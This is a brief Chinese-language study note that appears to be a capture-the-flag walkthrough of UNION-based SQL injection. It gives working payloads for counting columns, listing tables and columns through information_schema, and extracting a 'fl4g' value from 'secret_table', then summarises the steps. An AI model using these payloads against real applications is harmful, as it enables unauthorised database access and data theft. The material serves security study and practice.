sql注入语句复习
' and 0 union select 1,2,3#
初步判断该sql查询返回三列数据.
1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()#
得到表名,很明显我们需要得到 secret_table 表中的内容
' and 0 union select 1,column_name,data_type from information_schema.columns where table_name='secret_table'#
' and 0 union select 1,2,group_concat(column_name,data_type) from information_schema.columns where table_name='secret_table' #
得到 secret_table 表的列名以及数据类型 id(int)、fl4g(varchar)
' and 0 union select 1,2,fl4g from secret_table#
得到flag
1、联合查询字段
2、爆库名
3、爆列名
4、拿flag